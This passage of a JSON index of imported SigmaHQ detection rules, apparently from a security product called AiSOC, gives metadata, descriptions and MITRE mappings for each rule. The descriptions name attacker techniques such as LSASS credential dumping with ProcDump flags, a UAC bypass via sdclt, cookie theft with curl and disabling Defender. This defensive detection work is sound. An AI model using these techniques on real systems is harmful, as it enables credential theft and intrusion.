"_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-federated-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58f88172-a73d-442b-94c9-95eaed3cbb36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml" } }, { "id": "sigmahq-sigma-590a5f4c-6c8c-4f10-8307-89afe9453a9d", "type": "detection", "name": "Suspicious Child Process Created as System", "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-created-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" } }, { "id": "sigmahq-sigma-5947497f-1aa4-41dd-9693-c9848d58727d", "type": "detection", "name": "Suspicious Unblock-File", "description": "Remove the Zone.Identifier alternate data stream which 
identifies the file as downloaded from the internet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-unblock-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5947497f-1aa4-41dd-9693-c9848d58727d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" } }, { "id": "sigmahq-sigma-597a7e84-187d-458b-9e4f-2f5a0e676711", "type": "detection", "name": "Kubernetes Potential Enumeration Activity", "description": "Detects potential Kubernetes enumeration or attack activity via the audit log.\nThis includes the execution of common shells, utilities, or specialized tools like 'Rakkess' (access_matrix) and 'TruffleHog' via Kubernetes API requests.\nAttackers use these methods to perform reconnaissance (enumeration), secret harvesting, or execute code (exec) within a cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1609", "T1613" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-potential-enumeration-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "597a7e84-187d-458b-9e4f-2f5a0e676711", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_potential_enumeration_activity.yml" } }, { "id": "sigmahq-sigma-598290cf-5932-45cd-9123-be1e05ab4f2e", "type": "detection", "name": "OpenCanary - RDP New Connection Attempt", "description": "Detects instances where an RDP service on an OpenCanary node has had a connection attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-rdp-new-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "598290cf-5932-45cd-9123-be1e05ab4f2e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_rdp_connection_attempt.yml" } }, { "id": "sigmahq-sigma-59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "type": "detection", "name": "Execute Code with Pester.bat", "description": "Detects code execution via Pester.bat (Pester - PowerShell module for testing)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-code-with-pester-bat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml" } }, { "id": "sigmahq-sigma-59ec40bb-322e-40ab-808d-84fa690d7e56", "type": "detection", "name": "Nginx Core Dump", "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1499.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nginx-core-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "59ec40bb-322e-40ab-808d-84fa690d7e56", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/product/nginx/web_nginx_core_dump.yml" } }, { "id": "sigmahq-sigma-5a105d34-05fc-401e-8553-272b45c1522d", "type": "detection", "name": "CobaltStrike Service Installations - System", "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/cobaltstrike-service-installations-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a105d34-05fc-401e-8553-272b45c1522d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml" } }, { "id": "sigmahq-sigma-5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "type": "detection", "name": "Persistence Via New SIP Provider", "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-new-sip-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_sip_persistence.yml" } }, { "id": "sigmahq-sigma-5a3164f2-b373-4152-93cf-090b13c12d27", "type": "detection", "name": "Potentially Suspicious Child Process Of VsCode", "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. 
This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-vscode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a3164f2-b373-4152-93cf-090b13c12d27", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" } }, { "id": "sigmahq-sigma-5a44727c-3b85-4713-8c44-4401d5499629", "type": "detection", "name": "Replay Attack Detected", "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/replay-attack-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a44727c-3b85-4713-8c44-4401d5499629", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_replay_attack_detected.yml" } }, { 
"id": "sigmahq-sigma-5a5152f1-463f-436b-b2f5-8eceb3964b42", "type": "detection", "name": "Displaying Hidden Files Feature Disabled", "description": "Detects modifications to the \"Hidden\" and \"ShowSuperHidden\" explorer registry values in order to disable showing of hidden files and system files.\nThis technique is abused by several malware families to hide their files from normal users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/displaying-hidden-files-feature-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hide_file.yml" } }, { "id": "sigmahq-sigma-5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d", "type": "detection", "name": "Cmd Launched with Hidden Start Flags to Suspicious Targets", "description": "Detects cmd.exe executing commands with the \"start\" utility using \"/b\" (no window) or \"/min\" (minimized) flags.\nTo reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories.\nThis technique was observed in Chaos, DarkSide, and Emotet malware campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cmd-launched-with-hidden-start-flags-to-suspicious-targets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag.yml" } }, { "id": "sigmahq-sigma-5a6e1e16-07de-48d8-8aae-faa766c05e88", "type": "detection", "name": "Potential Cookies Session Hijacking", "description": "Detects execution of \"curl.exe\" with the \"-c\" flag in order to save cookie data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-cookies-session-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a6e1e16-07de-48d8-8aae-faa766c05e88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml" } }, { "id": "sigmahq-sigma-5a93eb65-dffa-4543-b761-94aa60098fb6", "type": "detection", "name": "Registry Hide Function from User", "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-hide-function-from-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hide_function_user.yml" } }, { "id": "sigmahq-sigma-5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f", "type": "detection", "name": "Windows Defender Threat Severity Default Action Modified", "description": "Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.\nThis is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,\nallowing malicious software to run unimpeded. 
An attacker might use this technique to bypass defenses before executing payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-threat-severity-default-action-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_defender_threat_action_modified.yml" } }, { "id": "sigmahq-sigma-5aad0995-46ab-41bd-a9ff-724f41114971", "type": "detection", "name": "Esentutl Volume Shadow Copy Service Keys", "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esentutl-volume-shadow-copy-service-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5aad0995-46ab-41bd-a9ff-724f41114971", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" } }, { "id": "sigmahq-sigma-5aecf3d5-f8a0-48e7-99be-3a759df7358f", "type": "detection", "name": "App Granted Privileged Delegated Or App Permissions", "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/app-granted-privileged-delegated-or-app-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml" } }, { "id": "sigmahq-sigma-5af54681-df95-4c26-854f-2565e13cfab0", "type": "detection", "name": "Successful Account Login Via WMI", "description": "Detects successful logon attempts performed with WMI", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/successful-account-login-via-wmi.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5af54681-df95-4c26-854f-2565e13cfab0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml" } }, { "id": "sigmahq-sigma-5afa454e-030c-4ab4-9253-a90aa7fcc581", "type": "detection", "name": "Device Registration or Join Without MFA", "description": "Monitor and alert for device registration or join events where MFA was not performed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/device-registration-or-join-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5afa454e-030c-4ab4-9253-a90aa7fcc581", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml" } }, { "id": "sigmahq-sigma-5afee48e-67dd-4e03-a783-f74259dcf998", "type": "detection", "name": "Potential LSASS Process Dump Via Procdump", "description": "Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.\nThis rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.\nLSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.\nAttackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-lsass-process-dump-via-procdump.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5afee48e-67dd-4e03-a783-f74259dcf998", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml" } }, { "id": "sigmahq-sigma-5b16df71-8615-4f7f-ac9b-6c43c0509e61", "type": "detection", "name": "Hide Schedule Task Via Index Value Tamper", "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hide-schedule-task-via-index-value-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" } }, { "id": "sigmahq-sigma-5b175490-b652-4b02-b1de-5b5b4083c5f8", "type": "detection", "name": "RedMimicry Winnti Playbook Registry Manipulation", "description": "Detects actions caused by the RedMimicry Winnti playbook", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/redmimicry-winnti-playbook-registry-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" } }, { "id": "sigmahq-sigma-5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "type": "detection", "name": "Suspicious Interactive PowerShell as SYSTEM", "description": "Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context",
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-interactive-powershell-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" } }, { "id": "sigmahq-sigma-5b768e71-86f2-4879-b448-81061cbae951", "type": "detection", "name": "Suspicious Manipulation Of Default Accounts Via Net.EXE", "description": "Detects suspicious manipulation of built-in default accounts such as 'administrator' and 'guest' via net.exe, for example enabling or disabling the account or changing its password.",
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-manipulation-of-default-accounts-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b768e71-86f2-4879-b448-81061cbae951", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml" } }, { "id": "sigmahq-sigma-5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "type": "detection", "name": "File With Suspicious Extension Downloaded Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-with-suspicious-extension-downloaded-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path":
"rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml" } }, { "id": "sigmahq-sigma-5b872a46-3b90-45c1-8419-f675db8053aa", "type": "detection", "name": "UAC Bypass via Sdclt", "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-sdclt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b872a46-3b90-45c1-8419-f675db8053aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" } }, { "id": "sigmahq-sigma-5ba243e5-8165-4cf7-8c69-e1d3669654c1", "type": "detection", "name": "Potential DLL Sideloading Of MpSvc.DLL", "description": "Detects potential DLL sideloading of \"MpSvc.dll\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-mpsvc-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ba243e5-8165-4cf7-8c69-e1d3669654c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mpsvc.yml" } }, { "id": "sigmahq-sigma-5bac7a56-da88-4c27-922e-c81e113b20cb", "type": "detection", "name": "Github Self-Hosted Runner Execution", "description": "Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.\nShai-Hulud is an npm supply chain worm targeting CI/CD environments.\nIt installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102.002", "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-self-hosted-runner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5bac7a56-da88-4c27-922e-c81e113b20cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_github_self_hosted_runner.yml" } }, { "id": "sigmahq-sigma-5bb68627-3198-40ca-b458-49f973db8752", "type": "detection", "name": "Rundll32 Execution Without Parameters", "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1570", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, 
